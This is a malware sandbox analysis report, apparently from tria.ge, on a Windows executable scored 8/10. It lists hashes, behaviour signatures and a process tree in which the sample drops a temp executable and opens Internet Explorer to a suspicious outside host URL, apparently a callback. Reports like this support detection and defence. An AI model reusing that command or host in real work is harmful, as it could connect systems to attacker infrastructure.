Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

ad984c406e...17.exe

windows7-x64

8

ad984c406e...17.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    362s
  • max time network
    442s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/12/2022, 21:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ad984c406ec4bf3e8686b7e6d1ab7cab0d0040787093818a1a57b4f223206217.exe

  • Size

    361KB

  • MD5

    1fd13a639ed0388516593d139f1b0000

  • SHA1

    3d8636cf47fec01c9954f16d103907c3c1d00239

  • SHA256

    ad984c406ec4bf3e8686b7e6d1ab7cab0d0040787093818a1a57b4f223206217

  • SHA512

    ee4a27ea02e23ab7e276bc5235cb4f4b2c6731039f51dd0e8f2f89474e6f52ff108dff62c3ae5861508aa8f7c5a2ce99f890c767d79980c22e37133dad2a3d80

  • SSDEEP

    6144:zflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:zflfAsiVGjSGecvX

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ad984c406ec4bf3e8686b7e6d1ab7cab0d0040787093818a1a57b4f223206217.exe
    "C:\Users\Admin\AppData\Local\Temp\ad984c406ec4bf3e8686b7e6d1ab7cab0d0040787093818a1a57b4f223206217.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Temp\mhfzxrpkhczusmke.exe
      C:\Temp\mhfzxrpkhczusmke.exe run
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1776
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
      2⤵
        PID:3384

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Temp\mhfzxrpkhczusmke.exe
      Filesize

      361KB

      MD5

      4dd1e800c2c1a2f2bb626f421ae37601

      SHA1

      39584533a5884c82c6324ffbcb9dd84834b56ee8

      SHA256

      d95de2bad941202ca539c9260345b29b0621204ab06a74eebde6a264dc59c5f1

      SHA512

      949c6016a8d04a08f65af03a3d2d6a075eb64939eccc3b7aabc9e3546d12e9cec37d334fcb51fb50a4706f9a77fedae215af51c70775b762637019a87c126fe2

      Download Submit

    • C:\Temp\mhfzxrpkhczusmke.exe
      Filesize

      361KB

      MD5

      4dd1e800c2c1a2f2bb626f421ae37601

      SHA1

      39584533a5884c82c6324ffbcb9dd84834b56ee8

      SHA256

      d95de2bad941202ca539c9260345b29b0621204ab06a74eebde6a264dc59c5f1

      SHA512

      949c6016a8d04a08f65af03a3d2d6a075eb64939eccc3b7aabc9e3546d12e9cec37d334fcb51fb50a4706f9a77fedae215af51c70775b762637019a87c126fe2

      Download Submit